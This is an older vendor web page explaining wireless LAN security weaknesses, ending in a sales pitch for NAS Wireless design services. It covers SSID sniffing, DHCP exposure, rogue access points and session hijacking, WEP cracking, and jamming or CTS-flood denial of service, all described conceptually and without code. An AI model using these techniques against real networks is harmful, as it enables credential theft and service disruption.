|
 Wireless
LAN Security
Because Wireless Networks use radio waves,
wireless LANs are open to hackers trying to access sensitive information or
spoil the operation of the network. In fact, most wireless LANs don't
implement any form of reliable security, enabling access to just about
anyone. We have proven that by driving around several large cities and using
802.11 packet sniffing tools to detect wireless LANs. We found that many
major corporations, retail stores, airports, and homes are wide open.
Spread spectrum not very secure
Several of the 802.11 wireless LAN standards
(including 802.11b) use spread spectrum, a modulation technique developed during
the days of World War II to keep enemy forces from jamming radio communications
and radio-guided missiles. When wireless LANs first began to appear in the early
1990s, vendors touted the inherent security of wireless LANs because of the use
of spread spectrum technology. Some wireless LAN vendors today still advertise
the security that spread spectrum provides.
Spread spectrum in general is capable of changing
the "spreading codes" in a secretive way, which makes it nearly impossible for
someone to decipher the signal's intelligence unless they know the code. The
problem, however, is that the 802.11 standard clearly describes the spreading
codes publicly so that companies can design interoperable 802.11 components. As
a result, a hacker only needs an 802.11-compliant radio Network Interface Card
(NIC) as the basis for connectivity, which obliterates the security benefits of
spread spectrum.
SSIDs are useless
The 802.11 standard specifies the SSID (service
set identifier) as a form of password for a user's radio NIC to join a
particular wireless LAN. 802.11 requires that the user's radio NIC have the same
SSID as the access point have to enable association and communications with
other devices. In fact, the SSID is the only "security" mechanism that the
access point requires to enable association in the absence of activating
optional security features.
The use of SSIDs is a fairly weak form of
security, however, because most access points broadcast the SSID multiple times
per second within the body of each beacon frame. A hacker can easily use an
802.11 analysis tool (e.g., AirMagnet, Netstumbler, or AiroPeek) to identify the
SSID. In addition, Windows XP does a great job of "sniffing" the SSID in use by
the network and automatically configuring the radio NIC within the end user
device.
Some network administrators turn off SSID
broadcasting (which deletes the SSID from the beacon frames), but a hacker can
still sniff the SSID from frames that stations use when associating with an
access point. They just have to wait until someone associates or re-assoicates
(e.g., when roaming) with the network.
Aside from sniffing the SSID, many wireless LAN
administrators make it even easier by using the vendor's default SSIDs, which
are pretty well known. For example Cisco uses tsunami and most other
vendors use the name of their company as the default SSID. Just do some war
driving, and you'll see that this is true.
DHCP hurts security
Even if an intruder is capable of associating with
an access point by using the correct SSID, they must often have an applicable IP
address before they can directly access resources (user PCs, servers, etc.) on
the network. Many wireless LANs, though, use DHCP (dynamic host configuration
protocol) to automatically assign IP addresses to users as they become active.
With DHCP enabled, a hacker receives an applicable IP address just as other
legitimate users do. This provides freedoms to the hacker you'd rather not
share.
For example, you may be sitting at an airport
using a public wireless LAN. Someone associated to the same wireless LAN can
easily use Windows to see other users (i.e., you) connected to the network. If
you have file sharing turned on, the other person can click on your device and
drill down to your documents folder and open or copy files to their laptop. This
is a serious problem that many end users overlook, especially when operating
from home and public networks.
Man-in-the-middle attacks
Through the use of an 802.11 analyzer, a person
can monitor 802.11 frames sent over the wireless LAN and easily fool the network
through various "man-in-the-middle" attacks. You can view the frames sent back
and forth between a user's radio NIC and access point during the association
process. As a result, you'll learn information about the radio card and access
point, such as IP address of both devices, association ID for the radio NIC, and
SSID of the network.
With this information, someone can setup a rogue
access point (on a different radio channel) closer to a particular user to force
the user's radio NIC to reassociate with the rogue access point. Because 802.11
doesn't provide access point authentication, the radio NIC will happily
reassoicate with the rogue access point. Once reassociation occurs, the rogue
access point will capture traffic from unsuspected users attempting to login to
their services. Of course this exposes sensitive user names and passwords to a
hacker who has an interface with the rogue access point.
Someone can also use man-in-the-middle techniques
using a rogue radio NIC. After gleaning information about a particular wireless
LAN by monitoring frame transmissions, a hacker can program a rogue radio NIC to
mimic a valid one. This enables the hacker to deceive the access point by
disassociating the valid radio NIC and reassociating again as a rogue radio NIC
with the same parameters as the valid radio NIC. As a result, the hacker can use
the rogue radio NIC to steal the session and carryon with a particular
network-based service, one that the valid user had logged into.
Problems with WEP
On 802.11 networks, you can enable WEP (wired
equivalent privacy), which encrypts the body of each frame. This is supposed to
keep hackers from viewing sensitive e-mails, user names and passwords,
proprietary documents, etc. Hackers can fairly easily decode WEP-encrypted
information after monitoring an active network for less than one day.
Three researchers at the University of California
at Berkeley, Nikita Borisov, Ian Goldberg and David Wagner, discovered a major
security flaw in WEP encryption. Furthermore, in August of 2001, cryptographers
Scott Fluhrer, Itsik Mantin and Adi Shamir published a paper on the weaknesses
of RC4 encryption, on which WEP is based. Shortly thereafter, in late August of
2001, a student at Rice University and two employees of AT&T Labs - Research
(Adam Stubblefield, John Ioannidis and Aviel D. Rubin) successfully implemented
the ideas expressed in those two publications. What's so fatal about it is that
it doesn't require any type of special equipment. All you need is a PC with a
standard wireless card working with modified drivers downloaded off the
Internet. With this equipment you can record and evaluate several hundreds of
thousands of data packets.
Consequently, don't depend on WEP for protecting
sensitive information. The use of WEP in most cases, nevertheless, is better
than no encryption at all, especially if you deploy a mechanism to change the
WEP key often.
Denial of service attacks
Another form of security attack is denial of
service. In this case, the hacker might not steal any information. They just
keep users from accessing services, either to gain some sort of competitive
advantage or just have some devious "fun."
A mischievous person can use a wireless client to
insert bogus packets into the wireless LAN with the intent of keeping users from
getting access to services. A brute force way of doing this is to setup a
relatively high power signal generator to produce enough RF interference to
block other radio NICs from accessing the medium. The 802.11 MAC Layer is fairly
polite and avoids transmitting when it senses other RF activity. This gives the
intruder enough control to keep users from accessing network services for an
indefinite period of time.
Other more eloquent methods for denying service
include fooling valid radio NICs with fake 802.11 frames. For example, someone
could setup their radio NIC (or 802.11 frame generator) to send a continuous
stream of CTS (clear-to-send) frames, which mimics an access point informing a
particular radio NIC to transmit and all others to wait. (CTS is part of
802.11's RTS/CTS function.) The radio NIC being given permission to transmit
could be a fictitious user. As a result, the legitimate radio NICs in end user
devices will continually delay access to the medium.
The bottom line
As you can see, there are many wireless LAN
security issues that require attention. If and how you handle these problems
depends greatly on your security requirements. In some cases, you might want to
keep the network as open as possible and only protect files on user PCs. Most
other scenarios, however, will likely need much more. It is possible to make
wireless LANs very secure, that's where NAS Wireless comes in.
NAS Wireless can design a Secure Wireless Network
to handle the needs of your Company or Organization.
|
